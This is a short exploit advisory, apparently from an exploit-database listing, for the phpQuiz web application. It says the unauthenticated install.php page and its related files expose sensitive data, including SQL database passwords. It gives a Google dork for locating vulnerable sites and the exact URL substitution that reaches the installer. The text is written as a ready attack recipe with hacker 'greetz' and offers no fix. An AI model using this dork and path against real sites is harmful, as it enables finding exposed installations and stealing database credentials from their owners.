phpQuiz suffers from a flaw that leaks sensitive information about the system.
09205ce1e9a97700b6765568130b3d61a5d9fb1caa21eecf4093a6326afe5a04
* phpQuiz sensitive file (install.php without authentification) + Files containing interesting info (passwords for sql db)
* By : sn0oPy
* Risk : verry high
* Site : https://phpquiz.com/
* Dork : intitle:"phpQuiz" | " DĂ©veloppĂ© par PhpQuiz v.1.0 " | "© PhpQuiz" | inurl:"PhpQuiz"
* exploit :
https://target.com/[phpquiz_path]/front/
replace by :
https://target.com/[phpquiz_path]/cfgphpquiz/install.php
* greetz : [subzero], Avg Team, Lhma9.